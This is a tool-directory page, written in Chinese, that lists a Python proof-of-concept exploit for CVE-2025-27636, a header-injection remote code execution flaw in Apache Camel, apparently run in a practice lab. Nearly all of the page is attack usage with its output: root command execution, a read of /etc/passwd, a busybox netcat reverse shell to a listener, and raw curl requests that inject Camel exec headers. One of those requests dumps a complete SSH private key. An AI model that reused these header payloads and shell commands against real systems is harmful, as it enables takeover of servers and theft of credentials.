Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-27636-RCE-in-Apache-Camel — Python PoC 利用 CVE-2025-27636,一个 Apache Camel 头部注入 RCE 漏洞,支持命令执行、文件读取和反向 shell 载荷。 | Kitploit
工具/GitHubGitHub/ac8999/cve-2025-27636-rce-in-apache-camel
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubac8999/cve-2025-27636-rce-in-apache-camel

CVE-2025-27636-RCE-in-Apache-Camel

Python PoC 利用 CVE-2025-27636,一个 Apache Camel 头部注入 RCE 漏洞,支持命令执行、文件读取和反向 shell 载荷。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
21天前尚未审核

CVE-2025-27636 – Apache Camel RCE

针对 Apache Camel 头注入 RCE(CVE-2025-27636)的简单 Python 漏洞利用程序。

用法

一次性命令执行

root@kitploit:~
┌──(root㉿user)-[/run/…/user/2024/HTBox/CVE-2025-27636]
└─# python3 CVE-2025-27636.py -t http://192.168.159.120 -c "id"
[*] Executing: id
uid=0(root) gid=0(root) groups=0(root)

读取文件

root@kitploit:~
┌──(root㉿user)-[/run/…/user/2024/HTBox/CVE-2025-27636]
└─# python3 CVE-2025-27636.py -t http://192.168.159.120 -c "cat /etc/passwd"
[*] Executing: cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

反向 shell

root@kitploit:~
┌──(root㉿user)-[/run/…/user/2024/HTBox/CVE-2025-27636]
└─# python3 CVE-2025-27636.py -t http://192.168.159.120 -r -L 192.168.45.238 -P 4444
[*] Triggering reverse shell → 192.168.45.238:4444
[*] Listener should already be running: rlwrap nc -lvnp 4444
[*] Trying busybox first (most reliable from your POC)...

┌──(root㉿user)-[/home/user]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.159.120] 49306
id
uid=0(root) gid=0(root)

注意:反向 shell 载荷使用了一个简单的 busybox 载荷(这可能不适用于你的场景)。

通过 curl 手动执行反向 Shell

root@kitploit:~
┌──(root㉿user)-[/run/…/user/2024/HTBox/CVE-2025-27636]
└─# curl "http://192.168.159.120:80/command-center" --header "CAmelExecCommandExecutable: busybox" --header "CAmelExecCommandArgs: nc 192.168.45.238 4444 -e sh"

┌──(root㉿user)-[/home/user]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.159.120] 49306
id
uid=0(root) gid=0(root)

通过 curl 手动读取文件

root@kitploit:~
┌──(root㉿user)-[/run/…/user/2024/HTBox/CVE-2025-27636]
└─# curl "http://192.168.159.120:80/command-center" --header "CAmelExecCommandExecutable: cat" --header "CAmelExecCommandArgs: /root/.ssh/id_rsa"            
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwWtSWaaZTrCUcJR1GYeF3avjBK6Bs2IwLb3UssVbOLgjKpSavgWU
bZ1MaFgoT7bPTtRI/FjO3886b/m1r55Ijn0MNB9svp14T18yByATLBr0/CgerVERCcfDPU
Jw7BkiQNBKfSGBpAWMoboFv5n72jqIXgTi0xkXFwpGtrUs6eg25KKhfiMAcJZnP36xk4Ng
2Y/pv1GFCoSdWkhSC0l775oP7/oS4oyhyBLuMbym8xswqaOT8zLD2hbRdWt00/s/OBiBa7
bCzIDILlImE9AouIW+mHMyMvFnx46XrXnJTPZXJcWbwQzBs176AUBtylP2C4iD7V+oWcfE
qZL4uoB1mwAAA8ivMETxrzBE8QAAAAdzc2gtcnNhAAABAQDBa1JZpplOsJRwlHUZh4Xdq+
MEroGzYjAtvdSyxVs4uCMqlJq+BZRtnUxoWChPts9O1Ej8WM7fzzpv+bWvnkiOfQw0H2y+
nXhPXzIHIBMsGvT8KB6tUREJx8M9QnDsGSJA0Ep9IYGkBYyhugW/mfvaOoheBOLTGRcXCk
a2tSzp6DbkoqF+IwBwlmc/frGTg2DZj+m/UYUKhJ1aSFILSXvvmg/v+hLijKHIEu4xvKbz
GzCpo5PzMsPaFtF1a3TT+z84GIFrtsLMgMguUiYT0Ci4hb6YczIy8WfHjpeteclM9lclxZ
vBDMGzXvoBQG3KU/YLiIPtX6hZx8Spkvi6gHWbAAAAAwEAAQAAAQAfFaTn9I7Z5yYMC8fg
APhCHmA/Pd5pWmPczg/TZUVaUbmRG83csR/gF/ISKOzdlsctZ4+NQqaIsJC3Mz4ASeNmRv
GBpPVAkyUlOGrdW0nJglGR/s6jUw52cGzPuRBV2Vo4aWE3R/3CQwQNb8yBtPkVYufMmGNt
wrADy2p+7ZIYyyoPewLIVWoaZyTq0fll0fd1Pbr3gbWEKSpz97B1sjGFrMReZUbsHZomvM
iXuQqoRBA+uIO5/UF8Lt4GdYMfrRME24ldZ057NxFtQgdxJ/K/ZqP1ZHq/PdApXY2DYdcG
/k9CD/sMTcjmIaR6By0+113huXNhchXyyoT3SaaDrJ/FAAAAgAt9gaETnIPHH/z2aAUwsB
51GRYfVv2OKokTdeDYaRT8KFq7PdSe7ENcxTHU2gU4V8mgLKFYp/mCPRhQXW6pRLYE6AMH
Gj56zQfDD3ku/ESNzyC6SwJH3TJBYpPVkSlEnCqt9KnLlGCPw42LzG5Ya70kv8OS8E9Qt+
yvSvD9VrSBAAAAgQDkITKG6C3GgMArN8Jq/xIoXnO7qA2KL0u8krwaIl6Q2vivJZdl2GzK
0mRkMJ4bX0v0uMpfNqc4EMt0Z+DhcO4x60R6Z5a7CmdT3w9NNbhHXQCPCnDPBbmTrI2ivU
G8N4ZK2/i3Q5NiiN8515+eZzzBv1LxaDFJf01ffDf/rFMuRwAAAIEA2QyMOzhQugtq9y9k
k0swKNwDLTKtmZBOueMYRQzDzhlmQNxtzNu8fudqeZwpiMlyZe8nJMFh4vwMXsIuNkRibu
bBSEQqoWHJbJ7/Qp4DkCTDHsI4MmbeqlTuY+ImRg92YrwUfpf4riAL60n5sIGXcrAx5k34
tMC6Gz5tY6cCBA0AAAAOcm9vdEBsb2NhbGhvc3QBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

下载工具